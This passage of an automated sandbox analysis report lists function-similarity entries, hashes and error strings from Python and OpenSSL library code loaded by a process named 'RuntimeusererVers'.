                                                                                                                                                                                                                                          • String ID: contiguous buffer expected
                                                                                                                                                                                                                                          • API String ID: 2934809616-3992619153
                                                                                                                                                                                                                                          • Opcode ID: 1bc393167bf0c67a39fc850561e46e34fdae40894da0818ca719f4001db1ca3f
                                                                                                                                                                                                                                          • Instruction ID: fd2086c133d843c59c467442c01e2966a9639033e7aa008c40995ce63fd07fa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bc393167bf0c67a39fc850561e46e34fdae40894da0818ca719f4001db1ca3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F01C61B18D0783EB1C4B76AC646B91364AF85BF5B486230DC2E8A690DE2EF4948700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_$Err_ExceptionObjectState
                                                                                                                                                                                                                                          • String ID: UnsupportedDigestmodError$_hashlib.UnsupportedDigestmodError
                                                                                                                                                                                                                                          • API String ID: 2341384915-1819944972
                                                                                                                                                                                                                                          • Opcode ID: cab25cee2ef474877533d6a272ae1fc29fafa22f63a0b338fcbf87a30af39434
                                                                                                                                                                                                                                          • Instruction ID: 6d5270003c2afba7d003cc5cef1593b3189b4224b8e4ffc5745bf9e6373b2d3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cab25cee2ef474877533d6a272ae1fc29fafa22f63a0b338fcbf87a30af39434
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F01D61B19E4381EA55CB25E44897923A0EF08BF0B585335DD1D46BA4DE2CF4E48700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: int_leas$int_leas$internal error, please report!$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-2343043947
                                                                                                                                                                                                                                          • Opcode ID: 4f0a0aaff9166599b321bcf5ed5f1c5d30282182ca895c5551f6253b89c6b022
                                                                                                                                                                                                                                          • Instruction ID: bad460dcc13f638b681d4ba5e85901aded8327031ef1b884745d62999b2319bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0a0aaff9166599b321bcf5ed5f1c5d30282182ca895c5551f6253b89c6b022
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C51BFA6A09F4695EB608B15C8642B967A5FB14FF8F548736CA2C072D5DF3CF8A1D300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                          • String ID: int_fast$int_fast$internal error, please report!$unsigned
                                                                                                                                                                                                                                          • API String ID: 1114863663-1550732720
                                                                                                                                                                                                                                          • Opcode ID: 057789135c42dfaaa6a35e435f66e4aabbfc77b9bb2c9b68fe972ad11cdbbe6d
                                                                                                                                                                                                                                          • Instruction ID: 14e4ab368c043c0cb64968ef5ed36b88ad92bb546f48efe05e6e48cf6b32ddd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 057789135c42dfaaa6a35e435f66e4aabbfc77b9bb2c9b68fe972ad11cdbbe6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C341BCA6A09E8686EB609B15D8642B923A5FB14FF8F508735CE2D032D5DF3CF891D301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$Object_$Track
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2188153816-0
                                                                                                                                                                                                                                          • Opcode ID: 6d80d1acaace31bacea4d85d1f1140c3cb67ac4064975d8bc055213bdd228b9a
                                                                                                                                                                                                                                          • Instruction ID: 7b93215acca7df2abf27f5d54a63cc183763c0231af51a2ad5a1924b84cbb594
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d80d1acaace31bacea4d85d1f1140c3cb67ac4064975d8bc055213bdd228b9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD21DD32615FD586DB44CF11ED945AAB7A9FB08BE8B060235DE5E43B99DF38E145C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_$Arg_DeallocDigestErr_FinalFreeIndexKeywordsLong_MallocNumber_OccurredPy_strhexSsize_tUnpackX_freeX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2315686776-0
                                                                                                                                                                                                                                          • Opcode ID: f110d98f0c6d9983d60f358f8505b4699d1fe2fc3896ddf209360801df41ace0
                                                                                                                                                                                                                                          • Instruction ID: 7ea05e241998d9987bff65b4c8c7d0c3d88f75f504b897b63722c11914cf215b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f110d98f0c6d9983d60f358f8505b4699d1fe2fc3896ddf209360801df41ace0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8215B31A09F4386EA548B15A818A796291BF45BF4F084734EDAD077E4EF3CF4A4C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Bytes_DeallocDigestErr_FinalFromIndexKeywordsLong_Number_OccurredSizeSsize_tStringUnpackX_freeX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1823454907-0
                                                                                                                                                                                                                                          • Opcode ID: 2fd325d52b6bfb3ccf8244bfe0aa6397c778399ca4e0abbb80a1c6c93883cceb
                                                                                                                                                                                                                                          • Instruction ID: 4b48ab2d83fbd987ae79af5c1ef3392691e89fe9e57584a3395e0d206ce8b54c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd325d52b6bfb3ccf8244bfe0aa6397c778399ca4e0abbb80a1c6c93883cceb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D218B31A09F4386EA548B16B808A79A291BF49BF4F084735DE6D077D8EF3CF0A08740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2231116090-0
                                                                                                                                                                                                                                          • Opcode ID: bbc04d1e51418fb5c88a6b4dbe813e7d522ff76cdc6b637606cc085351d25ffc
                                                                                                                                                                                                                                          • Instruction ID: 66ae53cc8632fde71a551c28b62e3bbaa391b0a260fafb26a6d6d7df061bd3f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbc04d1e51418fb5c88a6b4dbe813e7d522ff76cdc6b637606cc085351d25ffc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB014F51F0AE4244FE54AA65A519B7952A0FF947E4F085234FD5D8A7C7EE2CF8C14600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2231116090-0
                                                                                                                                                                                                                                          • Opcode ID: 019af44cfb1c0b4768685177c1041a10eb430569b491c32d9ce366f41598f14d
                                                                                                                                                                                                                                          • Instruction ID: 04bb16cd464d77f4c61175cb841bf5e4dd190e978d06ecca43505b66de950cc4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 019af44cfb1c0b4768685177c1041a10eb430569b491c32d9ce366f41598f14d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63016D91F0DE4240FE94AA66A54577D62E0AF98BE4F084234FD0D8B797EE2CF8C14600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$ClearDeallocRefsThread_free_lockThread_release_lockTrackWeak
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 778659985-0
                                                                                                                                                                                                                                          • Opcode ID: af7311f06d4814466a90193bbfc4a352b295f919e9586dec9b625acca272069e
                                                                                                                                                                                                                                          • Instruction ID: 0404ebbb87daed7ebbf51ea63242106776542cb40a00472fd69c9e795271a8c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af7311f06d4814466a90193bbfc4a352b295f919e9586dec9b625acca272069e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2901FB27A18F4282EB549F66E9953786361FB85FE8F085630CE1B8A354EF3CD496C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_size$_time64
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                          • API String ID: 2874025382-592572767
                                                                                                                                                                                                                                          • Opcode ID: 51edfa5d44c433f1c96c1318db48a2aa5f157a6a6b0e2826954d9ef86924e852
                                                                                                                                                                                                                                          • Instruction ID: 778a3c63884e15546a9268b15a7af86820ce2f6b056f7c274c4bdf7234bb528f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51edfa5d44c433f1c96c1318db48a2aa5f157a6a6b0e2826954d9ef86924e852
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6B17F75A08B8282EE68DA119580A7E67D4FB54FE4F140235EE4D47B85DF7CF541CB00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                                          • API String ID: 0-2512360314
                                                                                                                                                                                                                                          • Opcode ID: f4b82ac2777e7e13ee3f52d1b79094b7e670554c20a499e59a0f01eee76fc5dd
                                                                                                                                                                                                                                          • Instruction ID: db49d0380cca5bca7dbabe0ebc313e38b91e7571f43dd3115bb3d1e91517058e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4b82ac2777e7e13ee3f52d1b79094b7e670554c20a499e59a0f01eee76fc5dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEA17A32A08A8686EF648F15E8447B937A0FB44FA8F544276DA4D47798CF7DF889C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                          • String ID: array size would overflow a Py_ssize_t
                                                                                                                                                                                                                                          • API String ID: 1450464846-3850734049
                                                                                                                                                                                                                                          • Opcode ID: 16fd65bfa8437205e5c01afaad8a8b69b08ae243e5a68a29aadaa35832ec42bb
                                                                                                                                                                                                                                          • Instruction ID: 068997a9ecfdd5e1c251ac8521c07864db60b6d6931def73a783b140144beb08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16fd65bfa8437205e5c01afaad8a8b69b08ae243e5a68a29aadaa35832ec42bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B413A72A09F42C1EE588B16E9611B927A1FB48BF4F581235EA5E07BD5DF6CF8908310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • pointer subtraction: the distance between the two pointers is not a multiple of the item size, xrefs: 00007FF81E50684E
                                                                                                                                                                                                                                          • cannot subtract cdata '%s' and cdata '%s', xrefs: 00007FF81E50687C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: cannot subtract cdata '%s' and cdata '%s'$pointer subtraction: the distance between the two pointers is not a multiple of the item size
                                                                                                                                                                                                                                          • API String ID: 4212644371-3794040536
                                                                                                                                                                                                                                          • Opcode ID: 3369b6faf2cf54a16509a3c7a7d547b20a55980dfcd20d0685ed308414051417
                                                                                                                                                                                                                                          • Instruction ID: 6117329b86e282117c5c5de463b75e7a6c9f67eccbeda09939857295750153e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3369b6faf2cf54a16509a3c7a7d547b20a55980dfcd20d0685ed308414051417
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D314B22E09E47C1EE698B55DC705F423A0AF44BF4B581A36DA0D07A90DEACF8858311
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: ctype '%s' is of unknown size$expected a 'cdata' or 'ctype' object
                                                                                                                                                                                                                                          • API String ID: 4212644371-2764735189
                                                                                                                                                                                                                                          • Opcode ID: a518ecf0d3751cb35dd42a6dafafc98f47fd6c7b7ff1d980379f36a2833d80d9
                                                                                                                                                                                                                                          • Instruction ID: d4a7b8a437abfa585934116fa5a36b4f6549b3df7395e0aaf9d064c5b0a7c94d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a518ecf0d3751cb35dd42a6dafafc98f47fd6c7b7ff1d980379f36a2833d80d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D031E461B09E03C1EE58CB05ECB06B423A1BF96BE4B841632D50E43790DE6DF499C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyErr_Format.PYTHON311 ref: 00007FF81E5039D1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E5011A0: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF81E5011EB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
